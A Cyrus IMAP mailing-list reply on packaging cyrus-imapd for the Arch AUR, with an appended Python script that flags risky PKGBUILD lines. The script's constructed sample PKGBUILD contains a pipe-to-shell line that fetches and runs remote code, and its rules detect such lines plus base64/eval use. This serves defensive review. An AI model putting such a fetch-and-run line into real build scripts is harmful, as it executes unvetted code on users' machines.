On 3/13/19 11:49 AM, Jason Tibbitts wrote:
> In general I agree with you, but for a distro the issue
> generally comes down to dependencies.
>
> In Fedora, for example, we split the virus scanning portion out to a
> separate package, because otherwise cyrus-imapd ends up with a
> dependency on clamav. We want to avoid that because not everyone
> wants to maintain a clamav installation so we put the cyr_virusscan
> binary and its manpage in a separate subpackage.

Unfortunately that's not a model that works for the Arch Linux AUR.
Basically almost anyone can put out an AUR package (this is one of the
reasons nearly everything in the Linux ecosystem is readily available on
Arch), but such packages are required to be text files only with
absolutely no exceptions allowed. Most of the heavy lifting is done by a
PKGBUILD file, which is essentially a fancy shell script which relies on
the makepkg utility for interpretation. The PKGBUILD orchestrates
downloading, configuring, and compiling software directly from upstream
sources into a binary pacman package (think of it as Gentoo, but just
for extra goodies and not the base system). In cases where only
binaries are available, the PKGBUILD can download binaries from the
official upstream source and convert them to an Arch package. Users are
encouraged to examine these PKGBUILD files in order to make sure no one
is attempting to install malware on their systems, but of course most
don't, and there have been a couple of cases of AUR packages which
attempted to sneak malware into the AUR. It's still a pretty good
bazaar with no actual examples of serious malware deployment to date.
Enough people do look at the PKGBUILD files, and most convenience
utilities (e.g. yay or pacaur) try and make you look at the PKGBUILD
even though they're doing the work for you.

Generally this system works amazingly well, but this is an example where
it breaks down. And yes, it's precisely the dependencies which are an
issue. I can list the packages found here:
https://www.cyrusimap.org/imap/developer/compiling.html
as optional dependencies, but down the road someone will attempt to use
a feature and likely won't run `pacman -Qi` to remind themselves of the
necessity of these optional dependencies for that feature. The
alternative, requiring the installation of all possible dependencies,
seems unreasonable as well.

The saving grace is perhaps that this is a package aimed at systems
administrators rather than ordinary users, and as such I might be able
to get away with setting up an Arch Wiki page explaining what all the
optional dependencies are.
----
Cyrus Home Page: http://www.cyrusimap.org/
List Archives/Info: http://lists.andrew.cmu.edu/pipermail/info-cyrus/
To Unsubscribe:
https://lists.andrew.cmu.edu/mailman/listinfo/info-cyrus
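
Added example (not part of the original message, and not code from Arch, makepkg or any AUR helper): a Python pass over a PKGBUILD that flags the lines a reviewer should read first, in the spirit of the manual PKGBUILD inspection the message describes. The sample PKGBUILD, its package name and URLs are constructed, and the rule set is an assumption about what deserves attention, not an official checklist.

```python
import re

# Constructed sample PKGBUILD (not a real AUR package; names and URLs are placeholders).
SAMPLE_PKGBUILD = '''\
pkgname=example-tool
pkgver=1.0
source=("http://downloads.example.org/example-tool-$pkgver.tar.gz"
        "helper.sh::https://files.example.net/helper.sh")
sha256sums=('SKIP'
            'SKIP')
install=example-tool.install

package() {
  curl -s https://files.example.net/setup | bash
  make DESTDIR="$pkgdir" install
}
'''

# (rule name, pattern, why a reviewer should look). Assumed heuristics, not exhaustive.
CHECKS = [
    ("checksum-skipped", re.compile(r"\bSKIP\b"),
     "source is not pinned to a checksum"),
    ("plaintext-source", re.compile(r"\bhttp://"),
     "source fetched over unencrypted HTTP"),
    ("install-scriptlet", re.compile(r"^\s*install="),
     "scriptlet runs as root at install time; read that file too"),
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
     "fetches and runs code outside the declared source=() array"),
    ("encoded-or-eval", re.compile(r"\bbase64\s+(-d|--decode)\b|\beval\b"),
     "decodes or evaluates text at build time"),
]

def review_pkgbuild(text):
    """Return (line number, rule, reason) for every line that matches a check."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # comments are not executed by makepkg
        for rule, pattern, why in CHECKS:
            if pattern.search(line):
                findings.append((lineno, rule, why))
    return findings

if __name__ == "__main__":
    for lineno, rule, why in review_pkgbuild(SAMPLE_PKGBUILD):
        print(f"line {lineno}: {rule}: {why}")
```

A clean result only means none of these patterns matched; it does not replace reading the PKGBUILD and any `.install` file it references.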